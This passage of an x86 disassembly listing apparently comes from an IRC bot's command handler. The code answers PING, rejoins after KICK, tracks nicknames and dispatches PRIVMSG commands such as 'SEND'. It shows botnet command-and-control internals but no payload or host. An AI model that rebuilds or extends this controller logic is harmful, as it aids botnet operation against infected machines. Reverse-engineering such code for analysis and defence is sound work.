add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_401C95
push 7D0h
call ds:dword_4F534C ; Sleep
jmp short loc_401C52
; ---------------------------------------------------------------------------
loc_401C95: ; CODE XREF: sub_401B4F+137�j
cmp esi, 0FFFFFFFDh
jz short loc_401CBF
cmp esi, 0FFFFFFFEh
jz short loc_401CBB
cmp esi, 0FFFFFFFFh
jz loc_401BF7
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_401C4F
jmp loc_401BFE
; ---------------------------------------------------------------------------
loc_401CBB: ; CODE XREF: sub_401B4F+14E�j
push 1
jmp short loc_401CC1
; ---------------------------------------------------------------------------
loc_401CBF: ; CODE XREF: sub_401B4F+149�j
push 2
loc_401CC1: ; CODE XREF: sub_401B4F+16E�j
pop eax
jmp loc_401BF9
sub_401B4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401CC7(int Src,int,int,int,char *Source,int,int,int,int,FILE *File,int)
sub_401CC7 proc near ; CODE XREF: sub_401B4F+12A�p
var_5D98 = dword ptr -5D98h
var_5D88 = dword ptr -5D88h
var_5988 = byte ptr -5988h
var_5588 = byte ptr -5588h
var_53F8 = byte ptr -53F8h
var_51F8 = byte ptr -51F8h
Dest = byte ptr -50F4h
FullPath = byte ptr -4FF4h
var_4EF0 = byte ptr -4EF0h
var_4DF0 = byte ptr -4DF0h
var_4CF0 = byte ptr -4CF0h
var_4BF0 = byte ptr -4BF0h
var_4AF0 = byte ptr -4AF0h
var_48F0 = byte ptr -48F0h
var_47EC = byte ptr -47ECh
var_46EC = byte ptr -46ECh
var_45EC = dword ptr -45ECh
var_4588 = byte ptr -4588h
Str = byte ptr -4488h
var_4288 = byte ptr -4288h
var_4188 = byte ptr -4188h
var_4088 = byte ptr -4088h
var_3F88 = dword ptr -3F88h
var_3F84 = byte ptr -3F84h
var_3F04 = byte ptr -3F04h
var_3E00 = byte ptr -3E00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = dword ptr -3CF8h
var_3CF4 = dword ptr -3CF4h
var_3CF0 = dword ptr -3CF0h
var_3CEC = dword ptr -3CECh
var_3CE8 = dword ptr -3CE8h
var_3CE4 = byte ptr -3CE4h
var_3C64 = byte ptr -3C64h
var_3BE4 = byte ptr -3BE4h
var_3B64 = byte ptr -3B64h
var_3AE4 = byte ptr -3AE4h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = dword ptr -3A5Ch
var_3A58 = dword ptr -3A58h
var_3A54 = byte ptr -3A54h
var_37CD = byte ptr -37CDh
var_37CC = byte ptr -37CCh
var_36C8 = dword ptr -36C8h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B8 = dword ptr -36B8h
var_36B4 = dword ptr -36B4h
var_36AC = dword ptr -36ACh
var_36A8 = dword ptr -36A8h
var_36A4 = byte ptr -36A4h
var_3624 = byte ptr -3624h
var_35A4 = byte ptr -35A4h
var_3524 = byte ptr -3524h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = dword ptr -3498h
var_3494 = dword ptr -3494h
var_3490 = byte ptr -3490h
var_3410 = byte ptr -3410h
var_3390 = byte ptr -3390h
var_3310 = byte ptr -3310h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = dword ptr -3284h
var_3280 = dword ptr -3280h
var_327C = byte ptr -327Ch
var_31FC = byte ptr -31FCh
var_317C = byte ptr -317Ch
var_30FC = byte ptr -30FCh
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = dword ptr -3070h
var_306C = dword ptr -306Ch
var_3068 = byte ptr -3068h
var_2FE8 = byte ptr -2FE8h
var_2F68 = byte ptr -2F68h
var_2EE8 = byte ptr -2EE8h
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = dword ptr -2E60h
var_2E5C = dword ptr -2E5Ch
Filename = byte ptr -2E58h
var_2D54 = dword ptr -2D54h
var_2D50 = byte ptr -2D50h
var_2C4C = byte ptr -2C4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = dword ptr -2B44h
var_2B40 = dword ptr -2B40h
var_2B3C = byte ptr -2B3Ch
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB4 = dword ptr -2AB4h
var_2AB0 = dword ptr -2AB0h
var_2AA8 = byte ptr -2AA8h
var_2990 = byte ptr -2990h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = dword ptr -2900h
var_28FC = dword ptr -28FCh
var_28F8 = byte ptr -28F8h
var_2878 = byte ptr -2878h
var_2778 = byte ptr -2778h
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = dword ptr -2658h
var_2654 = dword ptr -2654h
var_2650 = byte ptr -2650h
var_25D0 = byte ptr -25D0h
var_24D0 = byte ptr -24D0h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = dword ptr -23B0h
var_23AC = dword ptr -23ACh
var_23A8 = byte ptr -23A8h
var_2328 = byte ptr -2328h
var_22A8 = byte ptr -22A8h
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = dword ptr -221Ch
var_2218 = dword ptr -2218h
var_2214 = byte ptr -2214h
var_2194 = byte ptr -2194h
var_2114 = byte ptr -2114h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = dword ptr -2088h
var_2084 = dword ptr -2084h
var_2080 = byte ptr -2080h
var_2000 = byte ptr -2000h
var_1F80 = byte ptr -1F80h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = dword ptr -1EF4h
var_1EF0 = dword ptr -1EF0h
var_1EEC = byte ptr -1EECh
var_1DEC = byte ptr -1DECh
var_1D6C = dword ptr -1D6Ch
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D54 = dword ptr -1D54h
var_1D50 = dword ptr -1D50h
var_1D48 = byte ptr -1D48h
var_1D34 = byte ptr -1D34h
var_1C30 = byte ptr -1C30h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1BA0 = dword ptr -1BA0h
var_1B9C = dword ptr -1B9Ch
var_1B94 = byte ptr -1B94h
var_1B80 = byte ptr -1B80h
var_1A7C = byte ptr -1A7Ch
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = dword ptr -19ECh
var_19E8 = dword ptr -19E8h
var_19E4 = byte ptr -19E4h
var_1964 = byte ptr -1964h
var_1924 = byte ptr -1924h
var_1824 = dword ptr -1824h
var_1820 = dword ptr -1820h
var_1814 = dword ptr -1814h
var_1810 = dword ptr -1810h
var_180C = dword ptr -180Ch
var_1808 = byte ptr -1808h
var_17D0 = byte ptr -17D0h
var_17B4 = byte ptr -17B4h
var_177C = byte ptr -177Ch
var_1778 = byte ptr -1778h
var_16F8 = byte ptr -16F8h
var_16B8 = byte ptr -16B8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = byte ptr -1614h
var_1594 = byte ptr -1594h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = dword ptr -1508h
var_1504 = byte ptr -1504h
var_14F4 = byte ptr -14F4h
var_1474 = byte ptr -1474h
var_13F4 = dword ptr -13F4h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = dword ptr -13DCh
var_13D8 = dword ptr -13D8h
var_13D4 = byte ptr -13D4h
var_1354 = byte ptr -1354h
var_12D4 = byte ptr -12D4h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1230 = byte ptr -1230h
var_11B0 = byte ptr -11B0h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1128 = dword ptr -1128h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1110 = dword ptr -1110h
var_110C = byte ptr -110Ch
var_108C = byte ptr -108Ch
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = dword ptr -0FECh
var_FE8 = byte ptr -0FE8h
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = dword ptr -0F5Ch
var_F58 = dword ptr -0F58h
var_F54 = byte ptr -0F54h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC4 = dword ptr -0EC4h
var_EC0 = byte ptr -0EC0h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = dword ptr -0E38h
var_E34 = dword ptr -0E34h
var_E30 = byte ptr -0E30h
var_E10 = byte ptr -0E10h
var_E00 = byte ptr -0E00h
var_D80 = dword ptr -0D80h
var_D7C = byte ptr -0D7Ch
var_CFC = byte ptr -0CFCh
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = dword ptr -0C5Ch
var_C58 = dword ptr -0C58h
var_C54 = byte ptr -0C54h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = byte ptr -0BC4h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = byte ptr -0B2Ch
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = byte ptr -0A94h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = dword ptr -0A04h
var_A00 = dword ptr -0A00h
var_9FC = byte ptr -9FCh
var_97C = word ptr -97Ch
var_978 = dword ptr -978h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = byte ptr -860h
var_850 = byte ptr -850h
var_7D0 = byte ptr -7D0h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_734 = dword ptr -734h
var_730 = dword ptr -730h
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_714 = dword ptr -714h
var_710 = byte ptr -710h
var_690 = dword ptr -690h
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_680 = dword ptr -680h
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_668 = dword ptr -668h
var_63C = dword ptr -63Ch
var_638 = word ptr -638h
var_624 = dword ptr -624h
var_620 = byte ptr -620h
var_5A0 = byte ptr -5A0h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
Drive = byte ptr -4C8h
var_4BC = byte ptr -4BCh
var_484 = byte ptr -484h
var_474 = byte ptr -474h
var_3F4 = byte ptr -3F4h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
Str1 = byte ptr -338h
var_31C = word ptr -31Ch
var_31A = word ptr -31Ah
var_318 = dword ptr -318h
var_30C = byte ptr -30Ch
Count = dword ptr -308h
var_2FC = byte ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E8 = byte ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E3 = byte ptr -2E3h
var_2E2 = byte ptr -2E2h
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
Dst = byte ptr -2C0h
var_C0 = byte ptr -0C0h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
SubStr = byte ptr -0A0h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_90 = dword ptr -90h
Args = byte ptr -8Ch
Format = dword ptr -88h
Str2 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_50 = byte ptr -50h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Source = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
File = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 5D88h
call __alloca_probe
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_A4], 3
mov [ebp+var_10], ebx
mov [ebp+var_A8], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C4], ebx
call _memset
push 1Bh ; Count
lea eax, [ebp+Str1]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 18h
cmp [ebp+Src], ebx
jz loc_402085
push esi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
dec esi
lea eax, [ebp+Str]
push esi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Str]
push offset SubStr ; " :"
push eax ; Str
call _strstr
mov [ebp+var_C], eax
lea eax, [ebp+Str]
push esi ; Count
push eax ; Source
lea eax, [ebp+var_4AF0]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_4AF0]
push offset Delim ; " "
push eax ; Str
call _strtok
add esp, 34h
mov [ebp+var_90], eax
lea esi, [ebp+Args]
push 1Fh
pop edi
loc_401D92: ; CODE XREF: sub_401CC7+DE�j
push offset asc_43FB90 ; " "
push ebx ; Str
call _strtok
mov [esi], eax
pop ecx
add esi, 4
dec edi
pop ecx
jnz short loc_401D92
mov esi, [ebp+var_90]
cmp esi, ebx
jz loc_402085
cmp dword ptr [ebp+Args], ebx
jz loc_402085
push 100h ; Size
lea eax, [ebp+var_960]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_14]
push 1Fh
pop edx
push 1
pop edi
loc_401DDF: ; CODE XREF: sub_401CC7+14A�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_401E0B
cmp byte ptr [eax], 2Dh
jnz short loc_401E13
cmp [eax+2], bl
jnz short loc_401E13
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_90]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_401E0B: ; CODE XREF: sub_401CC7+11C�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_401DDF
loc_401E13: ; CODE XREF: sub_401CC7+121�j
; sub_401CC7+126�j
cmp [ebp+var_8ED], bl
jz short loc_401E1E
mov [ebp+var_8], edi
loc_401E1E: ; CODE XREF: sub_401CC7+152�j
cmp [ebp+var_8F2], bl
jz short loc_401E2C
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_401E2C: ; CODE XREF: sub_401CC7+15D�j
cmp byte ptr [esi], 0Ah
jz short loc_401E66
push 7Fh ; Count
lea eax, [ebp+var_E00]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [esi+1]
push 17h ; Count
push eax ; Source
lea eax, [ebp+var_C0]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C0]
push offset asc_43FB94 ; "!"
push eax ; Str
call _strtok
add esp, 20h
loc_401E66: ; CODE XREF: sub_401CC7+168�j
push esi ; Str2
push offset aPing ; "PING"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401EB7
push dword ptr [ebp+Args] ; Args
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_401F5B
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 10h
jmp loc_401F5B
; ---------------------------------------------------------------------------
loc_401EB7: ; CODE XREF: sub_401CC7+1AE�j
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset a001 ; "001"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409CA2
push esi ; Str2
push offset a005 ; "005"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409CA2
push esi ; Str2
push offset a302_0 ; "302"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F1F
push offset a@ ; "@"
push [ebp+Str2] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_401F5B
inc eax
push 9Fh ; Count
push eax ; Source
push [ebp+arg_1C] ; Dest
call _strncpy
jmp short loc_401F58
; ---------------------------------------------------------------------------
loc_401F1F: ; CODE XREF: sub_401CC7+22F�j
push esi ; Str2
push offset a433_0 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F62
push ebx ; Str1
push dword_43F0A0 ; int
push dword_43F09C ; int
push [ebp+Source] ; Dest
call sub_40B44F
add esp, 10h
push [ebp+Source] ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
loc_401F58: ; CODE XREF: sub_401CC7+256�j
add esp, 0Ch
loc_401F5B: ; CODE XREF: sub_401CC7+1CF�j
; sub_401CC7+1EB�j ...
mov eax, edi
jmp loc_402088
; ---------------------------------------------------------------------------
loc_401F62: ; CODE XREF: sub_401CC7+267�j
mov esi, [ebp+arg_18]
mov [ebp+var_2C8], 3
mov edi, 80h
loc_401F74: ; CODE XREF: sub_401CC7+2D2�j
lea eax, [ebp+var_E00]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F91
mov [ebp+var_A8], 1
loc_401F91: ; CODE XREF: sub_401CC7+2BE�j
add esi, edi
dec [ebp+var_2C8]
jnz short loc_401F74
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset aKick ; "KICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40208D
mov esi, [ebp+arg_18]
mov [ebp+File], 3
loc_401FC0: ; CODE XREF: sub_401CC7+389�j
cmp [esi], bl
jz loc_40204B
push 7Fh ; Count
lea eax, [ebp+var_E00]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C0]
add esp, 0Ch
test eax, eax
jz short loc_40204B
cmp [ebp+Str2], ebx
jz short loc_40204B
push [ebp+Str2] ; Str2
lea eax, [ebp+var_C0]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40204B
lea eax, [ebp+var_C0]
mov [esi], bl
push eax
lea eax, [ebp+Dst]
push offset asc_43FC14 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
lea eax, [ebp+Dst]
push eax
call sub_415C3F
add esp, 14h
loc_40204B: ; CODE XREF: sub_401CC7+2FB�j
; sub_401CC7+31B�j ...
add esi, edi
dec [ebp+File]
jnz loc_401FC0
push [ebp+Str2] ; Str2
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402085
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8] ; Args
mov [eax], ebx
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_40207A: ; CODE XREF: sub_401CC7+60A�j
; sub_401CC7+8C0�j ...
push [ebp+arg_4] ; int
call sub_409CEE
loc_402082: ; CODE XREF: sub_401CC7+252C�j
; sub_401CC7+2549�j ...
add esp, 10h
loc_402085: ; CODE XREF: sub_401CC7+5B�j
; sub_401CC7+E8�j ...
push 1
loc_402087: ; CODE XREF: sub_401CC7+2A52�j
pop eax
loc_402088: ; CODE XREF: sub_401CC7+296�j
; sub_401CC7+2A74�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40208D: ; CODE XREF: sub_401CC7+2E9�j
push esi ; Str2
push offset aNick ; "NICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4021E3
mov eax, [ebp+Format]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+Src], 3
mov [ebp+File], eax
loc_4020B6: ; CODE XREF: sub_401CC7+441�j
lea eax, [ebp+var_E00]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402103
lea eax, [ebp+var_E00]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_402103
push [ebp+File] ; Source
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax ; Dest
call _strcpy
push [ebp+arg_1C] ; Source
push edi ; Dest
call _strcat
add esp, 10h
mov edi, 80h
loc_402103: ; CODE XREF: sub_401CC7+400�j
; sub_401CC7+417�j
add esi, edi
dec [ebp+Src]
jnz short loc_4020B6
lea eax, [ebp+var_C0]
test eax, eax
jz loc_402085
cmp [ebp+File], ebx
jz loc_402085
push [ebp+Source] ; Str2
lea eax, [ebp+var_C0]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40214B
push 0Fh ; Count
push [ebp+File] ; Source
push [ebp+Source] ; Dest
call _strncpy
loc_402143: ; CODE XREF: sub_401CC7+1C26�j
add esp, 0Ch
jmp loc_402085
; ---------------------------------------------------------------------------
loc_40214B: ; CODE XREF: sub_401CC7+46D�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_402150: ; CODE XREF: sub_401CC7+4AA�j
cmp [edi], bl
jz short loc_402167
lea eax, [ebp+var_E00]
push eax ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402178
loc_402167: ; CODE XREF: sub_401CC7+48B�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402150
jmp loc_402085
; ---------------------------------------------------------------------------
loc_402178: ; CODE XREF: sub_401CC7+49E�j
lea eax, [ebp+var_E00]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+Src], eax
jz loc_402085
push eax ; Str
call _strlen
push [ebp+File] ; Str
mov edi, eax
call _strlen
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_402085
push [ebp+Src]
shl esi, 7
push [ebp+File]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_45EC]
push ebx ; int
push eax ; int
push [ebp+arg_8] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 24h
jmp loc_402085
; ---------------------------------------------------------------------------
loc_4021E3: ; CODE XREF: sub_401CC7+3D5�j
push esi ; Str2
push offset aPart ; "PART"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402205
push esi ; Str2
push offset aQuit ; "QUIT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402232
loc_402205: ; CODE XREF: sub_401CC7+52B�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40220A: ; CODE XREF: sub_401CC7+563�j
cmp [edi], bl
jz short loc_402220
push [ebp+var_90] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402275
loc_402220: ; CODE XREF: sub_401CC7+545�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_40220A
mov esi, dword ptr [ebp+Args]
loc_402232: ; CODE XREF: sub_401CC7+53C�j
push esi ; Str2
push offset a353 ; "353"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4022D6
push [ebp+var_80] ; Str2
push [ebp+arg_8] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402261
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_402261: ; CODE XREF: sub_401CC7+58F�j
push [ebp+var_80] ; Args
push offset asc_43FCB4 ; "-"
loc_402269: ; CODE XREF: sub_401CC7+28BD�j
; sub_401CC7+2C3D�j ...
call sub_415CB3
loc_40226E: ; CODE XREF: sub_401CC7+1BD2�j
pop ecx
loc_40226F: ; CODE XREF: sub_401CC7+7C37�j
pop ecx
jmp loc_402085
; ---------------------------------------------------------------------------
loc_402275: ; CODE XREF: sub_401CC7+557�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dst]
push offset asc_43FC74 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push dword ptr [ebp+Args] ; Str2
push offset aPart_0 ; "PART"
call _strcmp
add esp, 18h
test eax, eax
jnz loc_402085
lea eax, [ebp+Dst]
push eax
mov eax, [ebp+var_90]
inc eax
push eax
push offset aNoticeSS_0 ; "NOTICE %s :%s\r\n"
jmp loc_40207A
; ---------------------------------------------------------------------------
loc_4022D6: ; CODE XREF: sub_401CC7+57A�j
push esi ; Str2
push offset aPrivmsg ; "PRIVMSG"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402319
push esi ; Str2
push offset aNotice ; "NOTICE"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402319
push esi ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B16
cmp dword_43F088, ebx
jz loc_409B16
loc_402319: ; CODE XREF: sub_401CC7+61E�j
; sub_401CC7+62F�j
push esi ; Str2
push offset aPrivmsg_0 ; "PRIVMSG"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4024A9
push esi ; Str2
push offset aNotice_0 ; "NOTICE"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4024A9
mov eax, [ebp+Str2]
inc [ebp+var_80]
mov [ebp+var_A4], 4
mov [ebp+Format], eax
loc_40235C: ; CODE XREF: sub_401CC7+89E�j
; sub_401CC7+8D4�j ...
mov eax, [ebp+var_A4]
mov esi, eax
shl esi, 2
mov eax, [ebp+esi+var_90]
lea edi, [ebp+esi+var_90]
push eax ; Str2
push offset dword_43FD4C ; Str1
mov [ebp+arg_8], eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402739
push dword ptr [ebp+esi+Args] ; Str2
push offset aSend ; "SEND"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402600
cmp [ebp+var_A8], ebx
jz loc_4025D9
push [ebp+esi+Format]
